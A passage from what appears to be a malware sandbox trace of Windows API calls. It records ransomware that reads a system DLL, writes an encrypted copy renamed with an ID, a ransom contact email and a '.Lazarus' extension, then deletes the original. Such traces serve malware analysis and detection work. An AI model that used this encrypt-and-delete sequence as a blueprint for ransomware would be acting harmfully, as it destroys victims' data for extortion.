CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0090.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0090.151] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0)) returned 1 [0090.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.152] AreFileApisANSI () returned 1 [0090.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0090.152] GetLastError () returned 0x0 [0090.152] SetLastError (dwErrCode=0x0) [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8be28 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0090.152] GetLastError () returned 0x0 [0090.152] SetLastError (dwErrCode=0x0) [0090.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8ad80 [0090.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x4ebc8 [0090.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0090.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0090.153] AreFileApisANSI () returned 1 [0090.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0090.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x12e) returned 0x4e568 [0090.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=151 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 151 [0090.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.153] GetFileType (hFile=0x368) returned 0x1 [0090.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0090.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0090.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0090.154] AreFileApisANSI () returned 1 [0090.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0090.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0090.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.154] GetFileType (hFile=0x418) returned 0x1 [0090.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0090.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0090.154] GetLastError () returned 0x0 [0090.154] SetLastError (dwErrCode=0x0) [0090.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0090.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0090.154] GetLastError () returned 0x0 [0090.154] SetLastError (dwErrCode=0x0) [0090.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0090.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0090.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.154] ReadFile (in: hFile=0x418, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0090.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0090.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0090.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4aca8 [0090.157] GetLastError () returned 0x0 [0090.157] SetLastError (dwErrCode=0x0) [0090.157] GetLastError () returned 0x0 [0090.157] SetLastError (dwErrCode=0x0) [0090.157] GetLastError () returned 0x0 [0090.157] SetLastError (dwErrCode=0x0) [0090.157] GetLastError () returned 0x0 [0090.157] SetLastError (dwErrCode=0x0) [0090.157] ReadFile (in: hFile=0x418, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.158] WriteFile (in: hFile=0x368, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.159] GetLastError () returned 0x0 [0090.159] SetLastError (dwErrCode=0x0) [0090.159] GetLastError () returned 0x0 [0090.159] SetLastError (dwErrCode=0x0) [0090.159] GetLastError () returned 0x0 [0090.159] SetLastError (dwErrCode=0x0) [0090.159] GetLastError () returned 0x0 [0090.159] SetLastError (dwErrCode=0x0) [0090.159] ReadFile (in: hFile=0x418, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.159] WriteFile (in: hFile=0x368, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.160] GetLastError () returned 0x0 [0090.160] SetLastError (dwErrCode=0x0) [0090.160] GetLastError () returned 0x0 [0090.160] SetLastError (dwErrCode=0x0) [0090.160] GetLastError () returned 0x0 [0090.160] SetLastError (dwErrCode=0x0) [0090.160] GetLastError () returned 0x0 [0090.160] SetLastError (dwErrCode=0x0) [0090.160] ReadFile (in: hFile=0x418, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.160] WriteFile (in: hFile=0x368, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.161] GetLastError () returned 0x0 [0090.161] SetLastError (dwErrCode=0x0) [0090.161] GetLastError () returned 0x0 [0090.161] SetLastError (dwErrCode=0x0) [0090.161] GetLastError () returned 0x0 [0090.161] SetLastError (dwErrCode=0x0) [0090.161] GetLastError () returned 0x0 [0090.161] SetLastError (dwErrCode=0x0) [0090.161] ReadFile (in: hFile=0x418, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.161] WriteFile (in: hFile=0x368, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.161] GetLastError () returned 0x0 [0090.161] SetLastError (dwErrCode=0x0) [0090.162] GetLastError () returned 0x0 [0090.162] SetLastError (dwErrCode=0x0) [0090.162] GetLastError () returned 0x0 [0090.162] SetLastError (dwErrCode=0x0) [0090.162] GetLastError () returned 0x0 [0090.162] SetLastError (dwErrCode=0x0) [0090.162] ReadFile (in: hFile=0x418, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.162] WriteFile (in: hFile=0x368, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.162] GetLastError () returned 0x0 [0090.162] SetLastError (dwErrCode=0x0) [0090.162] GetLastError () returned 0x0 [0090.162] SetLastError (dwErrCode=0x0) [0090.163] GetLastError () returned 0x0 [0090.163] SetLastError (dwErrCode=0x0) [0090.163] GetLastError () returned 0x0 [0090.163] SetLastError (dwErrCode=0x0) [0090.163] ReadFile (in: hFile=0x418, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0xcc0, lpOverlapped=0x0) returned 1 [0090.163] WriteFile (in: hFile=0x368, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.163] GetLastError () returned 0x0 [0090.163] SetLastError (dwErrCode=0x0) [0090.163] GetLastError () returned 0x0 [0090.163] SetLastError (dwErrCode=0x0) [0090.163] GetLastError () returned 0x0 [0090.163] SetLastError (dwErrCode=0x0) [0090.164] ReadFile (in: hFile=0x418, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0090.164] GetLastError () returned 0x0 [0090.164] SetLastError (dwErrCode=0x0) [0090.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0090.164] WriteFile (in: hFile=0x368, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327ef70*=0xcc0, lpOverlapped=0x0) returned 1 [0090.164] GetLastError () returned 0x0 [0090.164] SetLastError (dwErrCode=0x0) [0090.164] GetLastError () returned 0x0 [0090.164] SetLastError (dwErrCode=0x0) [0090.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0090.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0090.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0090.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4aca8 | out: hHeap=0x20000) returned 1 [0090.164] CloseHandle (hObject=0x368) returned 1 [0090.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0090.166] CloseHandle (hObject=0x418) returned 1 [0090.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0090.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0090.166] AreFileApisANSI () returned 1 [0090.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0090.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0090.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.167] GetFileType (hFile=0x418) returned 0x1 [0090.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.168] GetLastError () returned 0xb7 [0090.168] SetLastError (dwErrCode=0xb7) [0090.168] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0090.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0090.169] CloseHandle (hObject=0x418) returned 1 [0090.169] AreFileApisANSI () returned 1 [0090.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0090.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0090.169] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll")) returned 1 [0090.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0090.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0090.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0090.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.171] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x68c0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="AP972F~1.DLL")) returned 1 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0090.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0090.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0090.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0090.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0090.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0090.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0090.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0090.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0090.172] AreFileApisANSI () returned 1 [0090.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 94 [0090.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0090.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0090.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0090.172] AreFileApisANSI () returned 1 [0090.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0090.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x55f20 [0090.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft 